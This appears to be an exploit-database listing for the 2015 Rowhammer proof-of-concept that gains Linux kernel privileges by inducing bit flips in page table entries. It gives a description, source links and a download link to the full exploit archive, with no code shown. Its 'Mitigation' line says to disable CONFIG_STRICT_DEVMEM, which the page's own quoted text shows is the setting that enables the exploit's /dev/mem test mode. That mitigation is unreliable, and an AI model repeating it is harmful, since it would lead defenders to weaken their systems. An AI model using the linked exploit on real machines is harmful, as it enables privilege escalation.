DRAM Rowhammer Exploit to Gain Kernel Privileges

vendor:

N/A

by:

Mark Seaborn

8.2

CVSS

HIGH

Rowhammer Exploit

119

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2015

DRAM Rowhammer Exploit to Gain Kernel Privileges

This is a proof-of-concept exploit that is able to gain kernel privileges on machines that are susceptible to the DRAM 'rowhammer' problem. It runs as an unprivileged userland process on x86-64 Linux. It works by inducing bit flips in page table entries (PTEs). For development purposes, the exploit program has a test mode in which it induces a bit flip by writing to /dev/mem.

Mitigation:

Disable the CONFIG_STRICT_DEVMEM option in the Linux kernel image.

Source

Exploit-DB raw data:

Sources:
http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
https://code.google.com/p/google-security-research/issues/detail?id=283

Full PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36310.tar.gz

This is a proof-of-concept exploit that is able to gain kernel
privileges on machines that are susceptible to the DRAM "rowhammer"
problem.  It runs as an unprivileged userland process on x86-64 Linux.
It works by inducing bit flips in page table entries (PTEs).

For development purposes, the exploit program has a test mode in which
it induces a bit flip by writing to /dev/mem.  qemu_runner.py will run
the exploit program in test mode in a QEMU VM.  It assumes that
"bzImage" (in the current directory) is a Linux kernel image that was
built with /dev/mem enabled (specifically, with the the
CONFIG_STRICT_DEVMEM option disabled).

Mark Seaborn
mseaborn@chromium.org
March 2015